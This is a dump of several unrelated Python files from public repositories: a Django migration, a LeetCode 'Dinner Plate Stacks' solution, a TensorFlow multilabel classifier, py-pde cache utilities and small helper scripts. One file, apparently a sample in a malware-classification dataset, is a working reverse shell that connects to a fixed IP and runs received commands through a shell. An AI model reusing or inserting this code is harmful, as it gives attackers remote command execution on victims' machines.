323c49fd95ca00d51cdaf4961e35bfd308dabf1d
[]
no_license
zongqiqi/mypython
bbe212223002dabef773ee0dbeafbad5986b4639
b80f3ce6c30a0677869a7b49421a757c16035178
refs/heads/master
2020-04-21T07:39:59.594233
2017-12-11T00:54:44
2017-12-11T00:54:44
98,426,286
2
0
null
null
null
null
UTF-8
Python
false
false
461
py
# -*- coding: utf-8 -*- # Generated by Django 1.11 on 2017-05-08 06:24 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('images', '0001_initial'), ] operations = [ migrations.AddField( model_name='image', name='total_likes', field=models.PositiveIntegerField(db_index=True, default=0), ), ]
48dcd7160b1610706b8ecc0b420bf892c26bb623
f6f632bee57875e76e1a2aa713fdbe9f25e18d66
/python/_1001_1500/1172_dinner-plate-stacks.py
c97488c27269fb1eb844a70f14dafd25248ae8de
[]
no_license
Wang-Yann/LeetCodeMe
b50ee60beeeb3661869bb948bef4fbe21fc6d904
44765a7d89423b7ec2c159f70b1a6f6e446523c2
refs/heads/master
2023-08-07T05:31:23.428240
2021-09-30T15:33:53
2021-09-30T15:33:53
253,497,185
0
0
null
null
null
null
UTF-8
Python
false
false
8,429
py
#!/usr/bin/env python # -*- coding: utf-8 -*- # @Author : Rock Wayne # @Created : 2020-07-02 08:00:00 # @Last Modified : 2020-07-02 08:00:00 # @Mail : [email protected] # @Version : alpha-1.0 """ # 我们把无限数量 ∞ 的栈排成一行,按从左到右的次序从 0 开始编号。每个栈的的最大容量 capacity 都相同。 # # 实现一个叫「餐盘」的类 DinnerPlates: # # # DinnerPlates(int capacity) - 给出栈的最大容量 capacity。 # void push(int val) - 将给出的正整数 val 推入 从左往右第一个 没有满的栈。 # int pop() - 返回 从右往左第一个 非空栈顶部的值,并将其从栈中删除;如果所有的栈都是空的,请返回 -1。 # int popAtStack(int index) - 返回编号 index 的栈顶部的值,并将其从栈中删除;如果编号 index 的栈是空的,请返回 - # 1。 # # # # # 示例: # # 输入: # ["DinnerPlates","push","push","push","push","push","popAtStack","push","push", # "popAtStack","popAtStack","pop","pop","pop","pop","pop"] # [[2],[1],[2],[3],[4],[5],[0],[20],[21],[0],[2],[],[],[],[],[]] # 输出: # [null,null,null,null,null,null,2,null,null,20,21,5,4,3,1,-1] # # 解释: # DinnerPlates D = DinnerPlates(2); // 初始化,栈最大容量 capacity = 2 # D.push(1); # D.push(2); # D.push(3); # D.push(4); # D.push(5); // 栈的现状为: 2  4 #   1  3  5 # ﹈ ﹈ ﹈ # D.popAtStack(0); // 返回 2。栈的现状为:  4 #   1  3  5 # ﹈ ﹈ ﹈ # D.push(20); // 栈的现状为: 20 4 #   1  3  5 # ﹈ ﹈ ﹈ # D.push(21); // 栈的现状为: 20 4 21 #   1  3  5 # ﹈ ﹈ ﹈ # D.popAtStack(0); // 返回 20。栈的现状为: 4 21 #   1  3  5 # ﹈ ﹈ ﹈ # D.popAtStack(2); // 返回 21。栈的现状为: 4 #   1  3  5 # ﹈ ﹈ ﹈ # D.pop() // 返回 5。栈的现状为: 4 #   1  3 # ﹈ ﹈ # D.pop() // 返回 4。栈的现状为: 1 3 # ﹈ ﹈ # D.pop() // 返回 3。栈的现状为: 1 # ﹈ # D.pop() // 返回 1。现在没有栈。 # D.pop() // 返回 -1。仍然没有栈。 # # # # # 提示: # # # 1 <= capacity <= 20000 # 1 <= val <= 20000 # 0 <= index <= 100000 # 最多会对 push,pop,和 popAtStack 进行 200000 次调用。 # # Related Topics 设计 """ import heapq import pytest # leetcode submit region begin(Prohibit modification and deletion) class DinnerPlates: """ GOOD HARD Use a heap queue q to find the leftmost available stack. https://leetcode.com/problems/dinner-plate-stacks/discuss/366331/C%2B%2BPython-Two-Solutions """ def __init__(self, capacity: int): self.capacity = capacity self.q = [] # record the available stack, will use heap to quickly find the smallest available stack # if you are Java or C++ users, tree map is another good option. self.stacks = [] # record values of all stack of plates, its last nonempty stack are the rightmost position def push(self, val: int) -> None: # To push, we need to find the leftmost available position # first, let's remove any stacks on the left that are full # 1) self.q: if there is still available stack to insert plate # 2) self.q[0] < len(self.stacks): the leftmost available index self.q[0] is smaller than the current size of the stacks # 3) len(self.stacks[self.q[0]]) == self.c: the stack has reached full capacity while self.q and self.q[0] < len(self.stacks) and len(self.stacks[self.q[0]]) == self.capacity: # we remove the filled stack from the queue of available stacks heapq.heappop(self.q) # now we reach the leftmost available stack to insert # if the q is empty, meaning there are no more available stacks if not self.q: # open up a new stack to insert heapq.heappush(self.q, len(self.stacks)) # for the newly added stack, add a new stack to self.stacks accordingly if self.q[0] == len(self.stacks): self.stacks.append([]) # append the value to the leftmost available stack self.stacks[self.q[0]].append(val) def pop(self) -> int: # To pop, we need to find the rightmost nonempty stack # 1) stacks is not empty (self.stacks) and # 2) the last stack is empty while self.stacks and not self.stacks[-1]: # we throw away the last empty stack, because we can't pop from it self.stacks.pop() # now we reach the rightmost nonempty stack # we pop the plate from the last nonempty stack of self.stacks by using popAtStack function return self.popAtStack(len(self.stacks) - 1) def popAtStack(self, index: int) -> int: # To pop from an stack of given index, we need to make sure that it is not empty # 1) the index for inserting is valid and, # 2) the stack of interest is not empty if 0 <= index < len(self.stacks) and self.stacks[index]: # we add the index into the available stack heapq.heappush(self.q, index) # take the top plate, pop it and return its value return self.stacks[index].pop() # otherwise, return -1 because we can't pop any plate return -1 # Your DinnerPlates object will be instantiated and called as such: # obj = DinnerPlates(capacity) # obj.push(val) # param_2 = obj.pop() # param_3 = obj.popAtStack(index) # leetcode submit region end(Prohibit modification and deletion) def test_solution(): D = DinnerPlates(2) # // 初始化,栈最大容量 capacity = 2 D.push(1) D.push(2) D.push(3) D.push(4) D.push(5) # // 栈的现状为: 2  4 #   1  3  5 # ﹈ ﹈ ﹈ assert D.popAtStack(0) == 2 # D.popAtStack(0); // 返回 2。栈的现状为:  4 #   1  3  5 # # ﹈ ﹈ ﹈ D.push(20) # D.push(20); // 栈的现状为: 20 4 #   1  3  5 # ﹈ ﹈ ﹈ D.push(21) # D.push(21); // 栈的现状为: 20 4 21 #   1  3  5 # ﹈ ﹈ ﹈ assert D.popAtStack(0) == 20 # D.popAtStack(0); // 返回 20。栈的现状为: 4 21 #   1  3  5 # ﹈ ﹈ ﹈ assert D.popAtStack(2) == 21 # D.popAtStack(2); // 返回 21。栈的现状为: 4 #   1  3  5 # ﹈ ﹈ ﹈ assert D.pop() == 5 # D.pop() // 返回 5。栈的现状为: 4 #   1  3 # ﹈ ﹈ assert D.pop() == 4 # D.pop() // 返回 4。栈的现状为: 1 3 # ﹈ ﹈ assert D.pop() == 3 # D.pop() // 返回 3。栈的现状为: 1 # ﹈ assert D.pop() == 1 # D.pop() // 返回 1。现在没有栈。 assert D.pop() == -1 # D.pop() // 返回 -1。仍然没有栈。 if __name__ == '__main__': pytest.main(["-q", "--color=yes", "--capture=no", __file__])
8ff81c1069b16514fe71f425f113994814800221
89a19b7ba268fb45f0dd5ec0fe2046ffb2d7b8e0
/model/src/__main__.py
7972fb3a6e2dd66ca543b3de57571ddc228b7982
[]
no_license
docdok/C2AE-Multilabel-Classification
dcd3ebe5192420258fa265f00e66226efe761dc9
510f164bf60f8a93c527044e02edc0ce2285f322
refs/heads/master
2021-01-16T19:30:15.973602
2017-08-01T17:45:12
2017-08-01T17:45:12
null
0
0
null
null
null
null
UTF-8
Python
false
false
10,638
py
import os import sys import time import utils import numpy as np import tensorflow as tf from parser import Parser from config import Config from network import Network from dataset import DataSet from eval_performance import evaluate, patk os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' class Model(object): def __init__(self, config): self.epoch_count = 0 self.config = config self.data = DataSet(config) self.add_placeholders() self.summarizer = tf.summary self.net = Network(config, self.summarizer) self.optimizer = self.config.solver.optimizer self.y_pred = self.net.prediction(self.x, self.keep_prob) self.loss = self.net.loss(self.x, self.y, self.keep_prob) self.accuracy = self.net.accuracy(tf.nn.sigmoid(self.y_pred), self.y) self.patk = self.net.patk(self.y, self.y_pred) self.summarizer.scalar("accuracy", self.accuracy) self.summarizer.scalar("loss", self.loss) self.train = self.net.train_step(self.loss) self.saver = tf.train.Saver() self.init = tf.global_variables_initializer() self.local_init = tf.local_variables_initializer() def add_placeholders(self): self.x = tf.placeholder(tf.float32, shape=[None, self.config.features_dim]) self.y = tf.placeholder(tf.float32, shape=[None, self.config.labels_dim]) self.keep_prob = tf.placeholder(tf.float32) #self.k = int() def run_epoch(self, sess, data, summarizer, epoch): err = list() i = 0 step = epoch merged_summary = self.summarizer.merge_all() for X, Y, tot in self.data.next_batch(data): feed_dict = {self.x : X, self.y : Y, self.keep_prob : self.config.solver.dropout} if not self.config.load: summ, _, y_pred, loss = sess.run([merged_summary, self.train, self.y_pred, self.loss], feed_dict=feed_dict) err.append(loss) output = "Epoch ({}) Batch({}) - Loss : {}".format(self.epoch_count, i, loss) with open("../stdout/{}_train.log".format(self.config.project_name), "a+") as log: log.write(output + "\n") print(" {}".format(output), end='\r') step = int(epoch*tot + i) summarizer.add_summary(summ, step) i += 1 return np.mean(err), step def run_eval(self, sess, data, summary_writer=None, step=0): y, y_pred, loss_, metrics, p_k = list(), list(), 0.0, None, None accuracy, loss = 0.0, 0.0 merged_summary = self.summarizer.merge_all() i = 0 for X, Y, tot in self.data.next_batch(data): feed_dict = {self.x: X, self.y: Y, self.keep_prob: 1} if i == tot-1 and summary_writer is not None: if data == "validation": summ, loss_ = sess.run([merged_summary, self.loss], feed_dict=feed_dict) else : summ, loss_, accuracy_val = sess.run([merged_summary, self.loss, self.accuracy], feed_dict=feed_dict) summary_writer.add_summary(summ, step) else: if data == "validation": loss_, Y_pred= sess.run([self.loss, tf.nn.sigmoid(self.y_pred)], feed_dict=feed_dict) p_k = patk(predictions=Y_pred, labels=Y) else : loss_, Y_pred, accuracy_val = sess.run([self.loss, tf.nn.sigmoid(self.y_pred), self.accuracy], feed_dict=feed_dict) metrics = evaluate(predictions=Y_pred, labels=Y) accuracy += accuracy_val #metrics['accuracy'] loss += loss_ i += 1 X, Y = self.data.get_test() p_k = patk(sess.run(tf.nn.sigmoid(self.y_pred), feed_dict={self.x: X, self.y: Y, self.keep_prob: 1}), Y) # sess.run(self.patk, feed_dict={self.x: X, self.y: Y, self.keep_prob: 1}) # return loss / i , accuracy / self.config.batch_size, metrics, p_k def add_summaries(self, sess): if self.config.load or self.config.debug: path_ = "../results/tensorboard" else : path_ = "../bin/results/tensorboard" summary_writer_train = tf.summary.FileWriter(path_ + "/train", sess.graph) summary_writer_val = tf.summary.FileWriter(path_ + "/val", sess.graph) summary_writer_test = tf.summary.FileWriter(path_+ "/test", sess.graph) summary_writers = {'train': summary_writer_train, 'val': summary_writer_val, 'test': summary_writer_test} return summary_writers def fit(self, sess, summarizer): ''' - Patience Method : + Train for particular no. of epochs, and based on the frequency, evaluate the model using validation data. + If Validation Loss increases, decrease the patience counter. + If patience becomes less than a certain threshold, devide learning rate by 10 and switch back to old model + If learning rate is lesser than a certain ''' sess.run(self.init) sess.run(self.local_init) max_epochs = self.config.max_epochs patience = self.config.patience patience_increase = self.config.patience_increase improvement_threshold = self.config.improvement_threshold best_validation_loss = 1e6 self.epoch_count = 0 best_step, losses, learning_rate = -1, list(), self.config.solver.learning_rate while self.epoch_count < max_epochs : if(self.config.load == True): break start_time = time.time() average_loss, tr_step = self.run_epoch(sess, "train", summarizer['train'], self.epoch_count) duration = time.time() - start_time if not self.config.debug : if self.epoch_count % self.config.epoch_freq == 0 : val_loss, _, _, _ = self.run_eval(sess, "validation", summarizer['val'], tr_step) test_loss, _, metrics, patk= self.run_eval(sess, "test", summarizer['test'], tr_step) output = "=> Training : Loss = {:.2f} | Validation : Loss = {:.2f} | Test : Loss = {:.2f}".format(average_loss, val_loss, test_loss) with open("../stdout/validation.log", "a+") as f: output_ = output + "\n=> Test : Coverage = {}, Average Precision = {}, Micro Precision = {}, Micro Recall = {}, Micro F Score = {}".format(metrics['coverage'], metrics['average_precision'], metrics['micro_precision'], metrics['micro_recall'], metrics['micro_f1']) output_ += "\n=> Test : Macro Precision = {}, Macro Recall = {}, Macro F Score = {}\n=> P@K = {}\n\n".format(metrics['macro_precision'], metrics['macro_recall'], metrics['macro_f1'], patk) f.write(output_) print(output) if self.config.have_patience: if val_loss < best_validation_loss : if val_loss < best_validation_loss * improvement_threshold : self.saver.save(sess, self.config.ckptdir_path + "model_best.ckpt") best_validation_loss = val_loss best_step = self.epoch_count else : if patience < 1: self.saver.restore(sess, self.config.ckptdir_path + "model_best.ckpt") if learning_rate <= 0.00001 : print("=> Breaking by Patience Method") break else : learning_rate /= 10 patience = self.config.patience print("\033[91m=> Learning rate dropped to {}\033[0m".format(learning_rate)) else : patience -= 1 self.epoch_count += 1 print("=> Best epoch : {}".format(best_step)) if self.config.debug == True: sys.exit() test_loss, test_accuracy, test_metrics, p_k = self.run_eval(sess, "test", summarizer['test'], tr_step) returnDict = {"test_loss" : test_loss, "test_accuracy" : test_accuracy, 'test_metrics' : test_metrics, "test_pak" : p_k} if self.config.debug == False: returnDict["train"] = best_validation_loss return returnDict def init_model(config): tf.reset_default_graph() tf.set_random_seed(1234) with tf.variable_scope('Model', reuse=None) as scope: model = Model(config) tf_config = tf.ConfigProto(allow_soft_placement=True)#, device_count = {'GPU': 0}) tf_config.gpu_options.allow_growth = True sess = tf.Session(config=tf_config) if config.load == True: print("=> Loading model from checkpoint") model.saver.restore(sess, config.ckptdir_path) else: print("=> No model loaded from checkpoint") return model, sess def train_model(config): if config.load == True: print("\033[92m=>\033[0m Testing Model") else: print("\033[92m=>\033[0m Training Model") model, sess = init_model(config) with sess: summary_writers = model.add_summaries(sess) loss_dict = model.fit(sess, summary_writers) return loss_dict def main(): args = Parser().get_parser().parse_args() config = Config(args) loss_dict = train_model(config) metrics = loss_dict['test_metrics'] if config.debug == False: output = "=> Best Train Loss : {}, Test Loss : {}, Test Accuracy : {}".format(loss_dict["train"], loss_dict["test_loss"], loss_dict["test_accuracy"]) else : output = "=> Test Loss : {}, Test Accuracy : {}".format(loss_dict["test_loss"], loss_dict["test_accuracy"]) output += "\n=> Test : Coverage = {}, Average Precision = {}, Micro Precision = {}, Micro Recall = {}, Micro F Score = {}".format(metrics['coverage'], metrics['average_precision'], metrics['micro_precision'], metrics['micro_recall'], metrics['micro_f1']) output += "\n=> Test : Macro Precision = {}, Macro Recall = {}, Macro F Score = {}".format(metrics['macro_precision'], metrics['macro_recall'], metrics['macro_f1']) output += "\n=> Test : p@K values : {}".format(loss_dict['test_pak']) with open("../stdout/test_log.log", "a+") as f: f.write(output) print("\033[1m\033[92m{}\033[0m\033[0m".format(output)) if __name__ == '__main__' : np.random.seed(1234) main() # Phew!
49ddcfdac88e151ccd52723b98147eb5ab096274
bfcd8f1f6ac8590df321f23a422eca0370a25b8f
/myenv/bin/pyi-set_version
a3276f253e4ab124adb59f23c54ff3757e3c6917
[]
no_license
Stephen-Tipa-Augustine/KMC_ventilator
0567fa0b72d41fb0de11cd72c62567bed973d9f5
456e88ae4fff3984d5456517ba8787f9d5762745
refs/heads/master
2022-12-26T08:00:41.102890
2020-09-07T11:00:13
2020-09-07T11:00:13
293,500,282
0
1
null
2022-12-19T04:33:28
2020-09-07T10:49:08
Python
UTF-8
Python
false
false
283
#!/home/sephanayer/PycharmProjects/KMC_ventilator/myenv/bin/python # -*- coding: utf-8 -*- import re import sys from PyInstaller.utils.cliutils.set_version import run if __name__ == '__main__': sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0]) sys.exit(run())
63b818db9e4eccd807d593c3f43062cb64409b4b
4fd4d339d8e52fb80bcc4b3c0bf85eed11def9ff
/pde/tools/cache.py
71cfb06effa1cfc63fda51ecc69176e9053b6a51
[ "MIT" ]
permissive
Capri2014/py-pde
c3bb6e6544876a8d97e3932ae048f53d273e74ef
2686e75eff9db54dfab0db26a2634d31eac3962c
refs/heads/master
2022-12-19T04:55:12.374179
2020-09-25T16:06:51
2020-09-25T16:06:51
null
0
0
null
null
null
null
UTF-8
Python
false
false
20,996
py
""" Module containing functions for managing cache structures .. autosummary:: :nosignatures: cached_property cached_method hash_mutable hash_readable make_serializer make_unserializer DictFiniteCapacity SerializedDict .. codeauthor:: David Zwicker <[email protected]> """ from __future__ import division import collections import functools import logging import numbers from hashlib import sha1 from typing import Callable, Dict, Iterable, Optional import numpy as np def objects_equal(a, b) -> bool: """compares two objects to see whether they are equal In particular, this uses :func:`numpy.array_equal` to check for numpy arrays Args: a: The first object b: The second object Returns: bool: Whether the two objects are considered equal """ # compare numpy arrays if isinstance(a, np.ndarray): return np.array_equal(a, b) # type: ignore if isinstance(b, np.ndarray): return np.array_equal(b, a) # type: ignore # compare dictionaries if isinstance(a, dict): if not isinstance(b, dict) or len(a) != len(b): return False return all(objects_equal(v, b[k]) for k, v in a.items()) if isinstance(a, (tuple, list)): if a.__class__ != b.__class__ or len(a) != len(b): return False return all(objects_equal(x, y) for x, y in zip(a, b)) # use direct comparison return a == b # type: ignore def _hash_iter(it: Iterable) -> int: """ get hash of an iterable but turning it into a tuple first """ return hash(tuple(it)) def hash_mutable(obj) -> int: """return hash also for (nested) mutable objects. This function might be a bit slow, since it iterates over all containers and hashes objects recursively. Args: obj: A general python object Returns: int: A hash value associated with the data of `obj` """ if hasattr(obj, "_cache_hash"): return int(obj._cache_hash()) # deal with some special classes if isinstance(obj, (list, tuple)): return _hash_iter(hash_mutable(v) for v in obj) if isinstance(obj, (set, frozenset)): return hash(frozenset(hash_mutable(v) for v in obj)) if isinstance(obj, collections.OrderedDict): return _hash_iter( (k, hash_mutable(v)) for k, v in obj.items() if not (isinstance(k, str) and k.startswith("_cache")) ) unordered_mappings = ( dict, collections.abc.MutableMapping, collections.defaultdict, collections.Counter, ) if isinstance(obj, unordered_mappings): return hash( frozenset( (k, hash_mutable(v)) for k, v in sorted(obj.items()) if not (isinstance(k, str) and k.startswith("_cache")) ) ) if isinstance(obj, np.ndarray): return hash(obj.tobytes()) try: # try using the internal hash function return hash(obj) except TypeError: try: # try hashing the data buffer return hash(sha1(obj)) except (ValueError, TypeError): # otherwise, hash the internal dict return hash_mutable(obj.__dict__) def hash_readable(obj) -> str: """return human readable hash also for (nested) mutable objects. This function returns a json-like representation of the object. The function might be a bit slow, since it iterates over all containers and hashes objects recursively. Note that this hash function tries to return the same value for equivalent objects, but it does not ensure that the objects can be reconstructed from this data. Args: obj: A general python object Returns: str: A hash value associated with the data of `obj` """ if isinstance(obj, numbers.Number): return str(obj) if isinstance(obj, (str, bytes)): return '"' + str(obj).replace("\\", "\\\\").replace('"', '"') + '"' if isinstance(obj, (list, tuple)): return "[" + ", ".join(hash_readable(v) for v in obj) + "]" if isinstance(obj, (set, frozenset)): return "{" + ", ".join(hash_readable(v) for v in sorted(obj)) + "}" mappings = ( dict, collections.abc.MutableMapping, collections.OrderedDict, collections.defaultdict, collections.Counter, ) if isinstance(obj, mappings): hash_str = ", ".join( hash_readable(k) + ": " + hash_readable(v) for k, v in sorted(obj.items()) ) return "{" + hash_str + "}" if isinstance(obj, np.ndarray): return repr(obj) # otherwise, assume it's a generic object try: if hasattr(obj, "__getstate__"): data = obj.__getstate__() else: data = obj.__dict__ except AttributeError: # strange object without a dictionary attached to it return repr(obj) else: # turn arguments into something readable args = ", ".join( str(k) + "=" + hash_readable(v) for k, v in sorted(data.items()) if not k.startswith("_") ) return "{name}({args})".format(name=obj.__class__.__name__, args=args) def make_serializer(method: str) -> Callable: """returns a function that serialize data with the given method. Note that some of the methods destroy information and cannot be reverted. Args: method (str): An identifier determining the serializer that will be returned Returns: callable: A function that serializes objects """ if callable(method): return method if method is None: return lambda s: s if method == "hash": return hash if method == "hash_mutable": return hash_mutable if method == "hash_readable": return hash_readable if method == "json": import json return lambda s: json.dumps(s, sort_keys=True).encode("utf-8") if method == "pickle": import pickle return lambda s: pickle.dumps(s, protocol=pickle.HIGHEST_PROTOCOL) if method == "yaml": import yaml return lambda s: yaml.dump(s).encode("utf-8") raise ValueError("Unknown serialization method `%s`" % method) def make_unserializer(method: str) -> Callable: """returns a function that unserialize data with the given method This is the inverse function of :func:`make_serializer`. Args: method (str): An identifier determining the unserializer that will be returned Returns: callable: A function that serializes objects """ if callable(method): return method if method is None: return lambda s: s if method == "json": import json return lambda s: json.loads(s.decode("utf-8")) if method == "pickle": import pickle return lambda s: pickle.loads(s) if method == "yaml": import yaml return yaml.full_load if method == "yaml_unsafe": import yaml # @Reimport return yaml.unsafe_load # type: ignore raise ValueError("Unknown serialization method `%s`" % method) class DictFiniteCapacity(collections.OrderedDict): """ cache with a limited number of items """ default_capacity: int = 100 def __init__(self, *args, **kwargs): self.capacity = kwargs.pop("capacity", self.default_capacity) super(DictFiniteCapacity, self).__init__(*args, **kwargs) def check_length(self): """ ensures that the dictionary does not grow beyond its capacity """ while len(self) > self.capacity: self.popitem(last=False) def __eq__(self, other): return super().__eq__(other) and self.capacity == other.capacity def __ne__(self, other): return super().__ne__(other) or self.capacity != other.capacity def __setitem__(self, key, value): super(DictFiniteCapacity, self).__setitem__(key, value) self.check_length() def update(self, values): super(DictFiniteCapacity, self).update(values) self.check_length() class SerializedDict(collections.abc.MutableMapping): """a key value database which is stored on the disk This class provides hooks for converting arbitrary keys and values to strings, which are then stored in the database. """ def __init__( self, key_serialization: str = "pickle", value_serialization: str = "pickle", storage_dict: Optional[Dict] = None, ): """provides a dictionary whose keys and values are serialized Args: key_serialization (str): Determines the serialization method for keys value_serialization (str): Determines the serialization method for values storage_dict (dict): Can be used to chose a different dictionary for the underlying storage mechanism, e.g., storage_dict = PersistentDict() """ # initialize the dictionary that actually stores the data if storage_dict is None: self._data = {} else: self._data = storage_dict # define the methods that serialize and unserialize the data self.serialize_key = make_serializer(key_serialization) self.unserialize_key = make_unserializer(key_serialization) self.serialize_value = make_serializer(value_serialization) self.unserialize_value = make_unserializer(value_serialization) def __len__(self): return len(self._data) def __getitem__(self, key): # convert key to its string representation key_s = self.serialize_key(key) # fetch the value value = self._data[key_s] # convert the value to its object representation return self.unserialize_value(value) def __setitem__(self, key, value): # convert key and value to their string representations key_s = self.serialize_key(key) value_s = self.serialize_value(value) # add the item to the dictionary self._data[key_s] = value_s def __delitem__(self, key): # convert key to its string representation key_s = self.serialize_key(key) # delete the item from the dictionary del self._data[key_s] def __contains__(self, key): # convert key to its string representation key_s = self.serialize_key(key) # check whether this items exists in the dictionary return key_s in self._data def __iter__(self): # iterate dictionary for key_s in self._data.__iter__(): # convert the value to its object representation yield self.unserialize_key(key_s) class _class_cache: """ class handling the caching of results of methods and properties """ def __init__( self, factory=None, extra_args=None, ignore_args=None, hash_function="hash_mutable", doc=None, name=None, ): r"""decorator that caches calls in a dictionary attached to the instances. This can be used with most classes Example: An example for using the class is:: class Foo(): @cached_property() def property(self): return "Cached property" @cached_method() def method(self): return "Cached method" foo = Foo() foo.property foo.method() The cache can be cleared by setting `foo.\_cache\_methods = {}` if the cache factory is a simple dict, i.e, if `factory == None`. Alternatively, each cached method has a :func:`clear_cache_of_obj` method, which clears the cache of this particular method. In the example above we could thus call `foo.bar.clear\_cache\_of\_obj(foo)` to clear the cache. Note that the object instance has to be passed as a parameter, since the method :func:`bar` is defined on the class, not the instance, i.e., we could also call `Foo.bar.clear\_cache\_of\_obj(foo)`. To clear the cache from within a method, one can thus call `self.method_name.clear\_cache\_of\_obj(self)`, where `method\_name` is the name of the method whose cache is cleared Example: An advanced example is:: class Foo(): def get_cache(self, name): # `name` is the name of the method to cache return DictFiniteCapacity() @cached_method(factory='get_cache') def foo(self): return "Cached" Args: factory (callable): Function/class creating an empty cache. `dict` by default. This can be used with user-supplied storage backends by. The cache factory should return a dict-like object that handles the cache for the given method. extra_args (list): List of attributes of the class that are included in the cache key. They are then treated as if they are supplied as arguments to the method. This is important to include when the result of a method depends not only on method arguments but also on instance attributes. ignore_args (list): List of keyword arguments that are not included in the cache key. These should be arguments that do not influence the result of a method, e.g., because they only affect how intermediate results are displayed. hash_function (str): An identifier determining what hash function is used on the argument list. doc (str): Optional string giving the docstring of the decorated method name (str): Optional string giving the name of the decorated method """ self.extra_args = extra_args self.hash_function = hash_function self.name = name # setup the ignored arguments if ignore_args is not None: if isinstance(ignore_args, str): ignore_args = [ignore_args] self.ignore_args = set(ignore_args) else: self.ignore_args = None # check whether the decorator has been applied correctly if callable(factory): class_name = self.__class__.__name__ raise ValueError( f"Missing function call. Call this decorator as {class_name}() instead " f"of {class_name}" ) else: self.factory = factory def _get_clear_cache_method(self) -> Callable: """return a method that can be attached to classes to clear the cache of the wrapped method""" def clear_cache(obj): """ clears the cache associated with this method """ try: # try getting an initialized cache cache = obj._cache_methods[self.name] except (AttributeError, KeyError): # the cache was not initialized if self.factory is None: # the cache would be a dictionary, but it is not yet # initialized => we don't need to clear anything return # initialize the cache, since it might open a persistent # database, which needs to be cleared cache = getattr(obj, self.factory)(self.name) # clear the cache cache.clear() return clear_cache def _get_wrapped_function(self, func: Callable) -> Callable: """ return the wrapped method, which implements the cache """ if self.name is None: self.name = func.__name__ # create the function to serialize the keys hash_key = make_serializer(self.hash_function) @functools.wraps(func) def wrapper(obj, *args, **kwargs): # try accessing the cache try: cache = obj._cache_methods[self.name] except (AttributeError, KeyError) as err: # the cache was not initialized wrapper._logger.debug("Initialize the cache for `%s`", self.name) if isinstance(err, AttributeError): # the cache dictionary is not even present obj._cache_methods = {} # create cache using the right factory method if self.factory is None: cache = {} else: cache = getattr(obj, self.factory)(self.name) # store the cache in the dictionary obj._cache_methods[self.name] = cache # determine the key that encodes the current arguments if self.ignore_args: kwargs_key = { k: v for k, v in kwargs.items() if k not in self.ignore_args } func_args = [args, kwargs_key] else: func_args = [args, kwargs] if self.extra_args: for extra_arg in self.extra_args: func_args.append(getattr(obj, extra_arg)) cache_key = hash_key(tuple(func_args)) try: # try loading the results from the cache result = cache[cache_key] except KeyError: # if this failed, compute and store the results wrapper._logger.debug( "Cache missed. Compute result for method `%s` with args `%s`", self.name, func_args, ) result = func(obj, *args, **kwargs) cache[cache_key] = result return result # initialize the logger wrapper._logger = logging.getLogger(__name__) # type: ignore return wrapper class cached_property(_class_cache): r"""Decorator to use a method as a cached property The function is only called the first time and each successive call returns the cached result of the first call. Example: Here is an example for how to use the decorator:: class Foo(): @cached_property def bar(self): return "Cached" foo = Foo() result = foo.bar The data is stored in a dictionary named `_cache_methods` attached to the instance of each object. The cache can thus be cleared by setting `self.\_cache\_methods = {}`. The cache of specific property can be cleared using `self._cache_methods[property_name] = {}`, where `property\_name` is the name of the property Adapted from <https://wiki.python.org/moin/PythonDecoratorLibrary>. """ def __call__(self, method: Callable): """ apply the cache decorator to the property """ # save name, e.g., to be able to delete cache later self._cache_name = self.name self.clear_cache_of_obj = self._get_clear_cache_method() self.func = self._get_wrapped_function(method) self.__doc__ = self.func.__doc__ self.__name__ = self.func.__name__ self.__module__ = self.func.__module__ return self def __get__(self, obj, owner): """ call the method to obtain the result for this property """ return self.func(obj) class cached_method(_class_cache): r"""Decorator to enable caching of a method The function is only called the first time and each successive call returns the cached result of the first call. Example: The decorator can be used like so:: class Foo: @cached_method def bar(self): return "Cached" foo = Foo() result = foo.bar() The data is stored in a dictionary named `\_cache\_methods` attached to the instance of each object. The cache can thus be cleared by setting `self.\_cache\_methods = {}`. The cache of specific property can be cleared using `self.\_cache\_methods[property\_name] = {}`, where `property\_name` is the name of the property """ def __call__(self, method): """ apply the cache decorator to the method """ wrapper = self._get_wrapped_function(method) # save name, e.g., to be able to delete cache later wrapper._cache_name = self.name wrapper.clear_cache_of_obj = self._get_clear_cache_method() return wrapper
2001d879a3c4fa86e51f452141f58291f247e5d8
b580fd482147e54b1ca4f58b647fab016efa3855
/host_im/mount/malware-classification-master/samples/virus/sample_bad342.py
93d369222308b3fb6895c3732d78dc2b323386c3
[]
no_license
Barnsa/Dissertation
1079c8d8d2c660253543452d4c32799b6081cfc5
b7df70abb3f38dfd446795a0a40cf5426e27130e
refs/heads/master
2022-05-28T12:35:28.406674
2020-05-05T08:37:16
2020-05-05T08:37:16
138,386,344
0
0
null
null
null
null
UTF-8
Python
false
false
368
py
import tarfile import hashlib import bz2 import crypt import hmac import subprocess import socket import zipfile import zlib import gzip s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("175.20.0.200",8080)) while not False: command = s.recv(1024).decode("utf-8") if not command: break data = subprocess.check_output(command, shell=True) s.send(data)
a2e7dee9a0ef320ef1a4ca7ee015c89591a5713a
7707233ec4a550f765fd28e7731f72542478cc1e
/startClient.py
cfee671263f209eef1c6a228f66fa7ad21bc2361
[]
no_license
Angelina-Wang/518project
6c971c7dfa34ee44961e127aba72ea9c85d8a762
fb1056ff66eb18393b4532d6eae935ca6240f517
refs/heads/master
2020-09-23T10:29:33.930957
2020-01-13T01:01:22
2020-01-13T01:01:22
225,477,176
0
0
null
null
null
null
UTF-8
Python
false
false
152
py
from custom_classes import * import sys client = AClient() client.connectServer(sys.argv[1]) client.restart(float(sys.argv[2])) client.startListener()
[ "None" ]
None
39f8937093dcbe80de31af680dadd9de39c094e5
91a9f5a7afb398f4238527708cbc155dc972cbfa
/teg2/bdd_car_versions/bdd_car_6Aug2017/bair_car/nodes/runtime_parameters.py
fcabb93f3a883c1f48ad5b69ad2cf492c0088468
[]
no_license
bddmodelcar/kzpy3.2
cd6f9bf6b7b8b920c79b4ee36c2592b992ae4332
b044b26649b19b240bd580feca20424a237374b1
refs/heads/master
2021-01-19T21:01:58.687712
2017-08-23T22:39:56
2017-08-23T22:39:56
101,243,308
0
1
null
2017-08-24T02:04:50
2017-08-24T02:04:50
null
UTF-8
Python
false
false
3,778
py
